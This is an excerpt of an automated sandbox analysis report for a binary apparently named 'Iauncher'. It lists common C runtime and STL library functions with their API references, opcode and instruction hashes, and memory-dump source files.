Opcode Fuzzy Hash: 2785a1c6cd18acc39959c8b82dea44fceb6b44cdfe8933033d068c3bb6a8746c
Instruction Fuzzy Hash: 70B11671E1026AAFDB11DF98EC80BEDBBB5AF45320F144179E4049B3A2C7749D49EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00F14C6C Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00F14C73
std::_Lockit::_Lockit.LIBCPMT ref: 00F14C7D
int.LIBCPMT ref: 00F14C94

Part of subcall function 00F12577: std::_Lockit::_Lockit.LIBCPMT ref: 00F12588
Part of subcall function 00F12577: std::_Lockit::~_Lockit.LIBCPMT ref: 00F125A2

codecvt.LIBCPMT ref: 00F14CB7
std::_Facet_Register.LIBCPMT ref: 00F14CCE
std::_Lockit::~_Lockit.LIBCPMT ref: 00F14CEE

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 657605623abccb504354b135876c4674f0358805e8a9952ed5fde848fc790189
Instruction ID: 1f4757832b93d796064b78cbb59c75922f6a430d188316bf991eb550911d12e6
Opcode Fuzzy Hash: 657605623abccb504354b135876c4674f0358805e8a9952ed5fde848fc790189
Instruction Fuzzy Hash: 2B11D372D006199BCB15EBA4DD456EE77B5BF84730F240419F401A7291DFB8AE80BBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00F1967A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00F19671,00F19427,00F16F4B), ref: 00F19688
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F19696
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F196AF
SetLastError.KERNEL32(00000000,00F19671,00F19427,00F16F4B), ref: 00F19701

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 53b912988c80a4f810dc14b0de3d7d849e60bcb0aa2bd1c1c7146bae0ce609a7
Instruction ID: c28bc62ee69dad37106175f99261c2a5168db1e4cb1667bc7f2c0e9b5f23a55c
Opcode Fuzzy Hash: 53b912988c80a4f810dc14b0de3d7d849e60bcb0aa2bd1c1c7146bae0ce609a7
Instruction Fuzzy Hash: 7B01D47260E2169EA61926757C957DA3A46FF027707300229F921851E0EFE29C81B296

Uniqueness

Uniqueness Score: -1.00%

Function 00F11DFD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00F11E09
int.LIBCPMT ref: 00F11E1C

Part of subcall function 00F12577: std::_Lockit::_Lockit.LIBCPMT ref: 00F12588
Part of subcall function 00F12577: std::_Lockit::~_Lockit.LIBCPMT ref: 00F125A2

std::_Facet_Register.LIBCPMT ref: 00F11E4F
std::_Lockit::~_Lockit.LIBCPMT ref: 00F11E65

Strings

pKp, xrefs: 00F11E0E, 00F11E5C

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID: pKp
API String ID: 459529453-3896006320
Opcode ID: 57ef15024ebebd2c5cc75960999befdb79e243f651c15e7c9f03d9354c99dcde
Instruction ID: 7247cde9b644d3747f2df3fe2fa477b3b8f7397997a435d5d1d4390875ef76cd
Opcode Fuzzy Hash: 57ef15024ebebd2c5cc75960999befdb79e243f651c15e7c9f03d9354c99dcde
Instruction Fuzzy Hash: CA01A732900114ABCB15ABA4DC059EE7769EF80770F600158F901A7291EF74AE81F790

Uniqueness

Uniqueness Score: -1.00%

Function 00F11D84 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00F11D90
int.LIBCPMT ref: 00F11DA3

Part of subcall function 00F12577: std::_Lockit::_Lockit.LIBCPMT ref: 00F12588
Part of subcall function 00F12577: std::_Lockit::~_Lockit.LIBCPMT ref: 00F125A2

std::_Facet_Register.LIBCPMT ref: 00F11DD6
std::_Lockit::~_Lockit.LIBCPMT ref: 00F11DEC

Strings

Ip, xrefs: 00F11D95, 00F11DE3

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID: Ip
API String ID: 459529453-2509181420
Opcode ID: 1b03e80d1623688cd145e9dc003eefef3b28fc53b71862e2a3498438c75986c6
Instruction ID: 88d2aed6f25b8d8635217892579278909592e06f1e3d78fcaf2a27a1b68baeae
Opcode Fuzzy Hash: 1b03e80d1623688cd145e9dc003eefef3b28fc53b71862e2a3498438c75986c6
Instruction Fuzzy Hash: 9601D676900114ABCB19ABA8EC058EE7769EF80770F240158F901AB2D1EF34EEC1F794

Uniqueness

Uniqueness Score: -1.00%

Function 00F20EA9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A03C9F43,?,?,00000000,00F32854,000000FF,?,00F20E39,?,?,00F20E0D,00000000), ref: 00F20EDE
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F20EF0
FreeLibrary.KERNEL32(00000000,?,00000000,00F32854,000000FF,?,00F20E39,?,?,00F20E0D,00000000), ref: 00F20F12

Strings

CorExitProcess, xrefs: 00F20EE8
mscoree.dll, xrefs: 00F20ED7

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b2f0ca69c0b7168ba6ae898efcf41b292320620bb61181eeddfd5a7818b29ae1
Instruction ID: e2a1d6657e5597a7310d1a2c1d015557a8f160c1c2b9e1e3f5b411250858860f
Opcode Fuzzy Hash: b2f0ca69c0b7168ba6ae898efcf41b292320620bb61181eeddfd5a7818b29ae1
Instruction Fuzzy Hash: 0A016772A48629EFDB159F54DD05BAEB7B9FB04735F010525F811E22D0DB74E900DE90

Uniqueness

Uniqueness Score: -1.00%

Function 00F1462E Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00F14635
std::_Lockit::_Lockit.LIBCPMT ref: 00F14640
std::_Lockit::~_Lockit.LIBCPMT ref: 00F146AE

Part of subcall function 00F14791: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00F147A9

std::locale::_Setgloballocale.LIBCPMT ref: 00F1465B
_Yarn.LIBCPMT ref: 00F14671

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: 97e475a25d4044939de52abf8ad37f0d5fe4e18c877cdf4de7580c04fe06c525
Instruction ID: 936f2762fdeb493d7a82a23cba5f4f39238051f79e25ca0b33ad60c09265527d
Opcode Fuzzy Hash: 97e475a25d4044939de52abf8ad37f0d5fe4e18c877cdf4de7580c04fe06c525
Instruction Fuzzy Hash: 64017C75A009159BCB0AEB20DD955BC7BA2EFC5760B244018E80197382DF78BA86FB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F1A7C2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00F1A773,00000000,?,?,?,?,?,00F1A89D,00000002,FlsGetValue,00F35D40,FlsGetValue), ref: 00F1A7CF
GetLastError.KERNEL32(?,00F1A773,00000000,?,?,?,?,?,00F1A89D,00000002,FlsGetValue,00F35D40,FlsGetValue,00000000,?,00F1972D), ref: 00F1A7D9
LoadLibraryExW.KERNEL32(?,00000000,00000000,00000000,?,00F1972D,?,?,?,?,?,?), ref: 00F1A801

Strings

api-ms-, xrefs: 00F1A7E6

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 3ea9f31e0fd8a258e250443c0bdc5198085aea805a8a45d155ebf989580a84cd
Instruction ID: 22ab64b101595aa1a215a8a5e058c13a00e0b2786ac79fb5408b73238b1d4978
Opcode Fuzzy Hash: 3ea9f31e0fd8a258e250443c0bdc5198085aea805a8a45d155ebf989580a84cd
Instruction Fuzzy Hash: 14E01271780208B6DB111B60ED46B593F559B00B70F114020FA0DE40E1E762B8A5B585

Uniqueness

Uniqueness Score: -1.00%

Function 00F27870 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(A03C9F43,00000000,00000000,00000000), ref: 00F278D3

Part of subcall function 00F28FAF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F26B60,?,00000000,-00000008), ref: 00F2905B

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F27B2E
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F27B76
GetLastError.KERNEL32 ref: 00F27C19

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 21555b61e934ab404de7388ec5d0fe9b1784c71a3643753fd9430e16659bb924
Instruction ID: 6f3e99353359696b63fb9c2ae9c00c01eb3f0a1f14dd3090da38e73f9ea78968
Opcode Fuzzy Hash: 21555b61e934ab404de7388ec5d0fe9b1784c71a3643753fd9430e16659bb924
Instruction Fuzzy Hash: 7CD178B5E042699FCF05DFE8E880AADBBB5FF48310F18452AE855EB351D730A941DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F19791 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00F19858
___AdjustPointer.LIBCMT ref: 00F1987B
___AdjustPointer.LIBCMT ref: 00F19917

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 70f99301476cb9cb24e25b7ae0cd6018a13a1eea419b74afc10a78108920d5ba
Instruction ID: b508922d6c25c52514402a15660780667ba7135c44c0b7fd46e90ed260a2a691
Opcode Fuzzy Hash: 70f99301476cb9cb24e25b7ae0cd6018a13a1eea419b74afc10a78108920d5ba
Instruction Fuzzy Hash: 1451DF72A092069FEB299F54D861BFA73A4EF41730F54402DE81286291E7B6ECC1E7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00F293CB Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00F28FAF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F26B60,?,00000000,-00000008), ref: 00F2905B

GetLastError.KERNEL32 ref: 00F2942F
__dosmaperr.LIBCMT ref: 00F29436
GetLastError.KERNEL32(?,?,?,?), ref: 00F29470
__dosmaperr.LIBCMT ref: 00F29477

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: d3142c91c9324273ce203ceb4133b97c57d4290ff64dbc71860a654829f2784f
Instruction ID: b9fefaa447735a86b522048a440af6e765e0c7888594c21b3b3d70a529ead52e
Opcode Fuzzy Hash: d3142c91c9324273ce203ceb4133b97c57d4290ff64dbc71860a654829f2784f
Instruction Fuzzy Hash: 5F21D332A08225AF9B20EF66AC8096BB7ADFF40374B00C519F92597240D774EC41A790

Uniqueness

Uniqueness Score: -1.00%

Function 00F201EB Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ba75f333217c2b45ead4eb6da17610e7e096b7a3b838c7da42f586d0fb09f16
Instruction ID: 6c913291c4c3ee1353e5dfe7debe40a84d796068f3e0e2905ed39f05358f4902
Opcode Fuzzy Hash: 7ba75f333217c2b45ead4eb6da17610e7e096b7a3b838c7da42f586d0fb09f16
Instruction Fuzzy Hash: 0E219D33A00225EF9B20AFA1EC49D6A77ADAF00374710462AF9559B592DF34EC40E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F2A361 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00F2A369

Part of subcall function 00F28FAF: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F26B60,?,00000000,-00000008), ref: 00F2905B

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F2A3A1
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F2A3C1

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 0dbef6afd9b8c37ac6b3aa1b63557cdb0d85c49e8405f7415c99156d890c227f
Instruction ID: 5d965dafc62356c99d00457e20d15e99f0a667d5d7595f334ee576c1e4a1068f
Opcode Fuzzy Hash: 0dbef6afd9b8c37ac6b3aa1b63557cdb0d85c49e8405f7415c99156d890c227f
Instruction Fuzzy Hash: F61104F29026397F6611B7B1BC8ACAF3A9DDF443B43110024F401D5101FE69ED4075B2

Uniqueness

Uniqueness Score: -1.00%

Function 00F11E76 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00F11E82
int.LIBCPMT ref: 00F11E95

Part of subcall function 00F12577: std::_Lockit::_Lockit.LIBCPMT ref: 00F12588
Part of subcall function 00F12577: std::_Lockit::~_Lockit.LIBCPMT ref: 00F125A2

std::_Facet_Register.LIBCPMT ref: 00F11EC8
std::_Lockit::~_Lockit.LIBCPMT ref: 00F11EDE

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: dbffce7667b0a7fb610953c4cda4c2c378846442d63189dcff00b90898c25313
Instruction ID: cee57ff8562a457f425101e1cd6db8fe11dc920dac9ead7e1bd066b00997d65f
Opcode Fuzzy Hash: dbffce7667b0a7fb610953c4cda4c2c378846442d63189dcff00b90898c25313
Instruction Fuzzy Hash: 3501A732900518ABCB15ABE5DC058EE7769AF84770B200159F90197291EB74EE81F790

Uniqueness

Uniqueness Score: -1.00%

Function 00F30A5F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00F2F92B,00000000,00000001,00000000,00000000,?,00F27C6D,00000000,00000000,00000000), ref: 00F30A76
GetLastError.KERNEL32(?,00F2F92B,00000000,00000001,00000000,00000000,?,00F27C6D,00000000,00000000,00000000,00000000,00000000,?,00F281F4,00000000), ref: 00F30A82

Part of subcall function 00F30A48: CloseHandle.KERNEL32(FFFFFFFE,00F30A92,?,00F2F92B,00000000,00000001,00000000,00000000,?,00F27C6D,00000000,00000000,00000000,00000000,00000000), ref: 00F30A58

___initconout.LIBCMT ref: 00F30A92

Part of subcall function 00F30A0A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F30A39,00F2F918,00000000,?,00F27C6D,00000000,00000000,00000000,00000000), ref: 00F30A1D

WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00F2F92B,00000000,00000001,00000000,00000000,?,00F27C6D,00000000,00000000,00000000,00000000), ref: 00F30AA7

Memory Dump Source

Source File: 00000002.00000002.1741112549.0000000000F11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000002.00000002.1741093303.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741140251.0000000000F34000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F3E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F74000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741160341.0000000000F83000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741230875.0000000000F8C000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.1741260704.0000000000F8D000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f10000_Iauncher.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: e42cb861f0849a7fd9f63754c571374269f5308f6309a392aae841c31440a70b
Instruction ID: 78df07c4c595bc30dcf1421e94f8449ccf87c32a864a00a24eb739230919bdd4
Opcode Fuzzy Hash: e42cb861f0849a7fd9f63754c571374269f5308f6309a392aae841c31440a70b
Instruction Fuzzy Hash: B9F01536500258BBCF622FD5FC08A8A3F67FF183B1F044021FA5985160CA36A820BB90

Uniqueness

Uniqueness Score: -1.00%

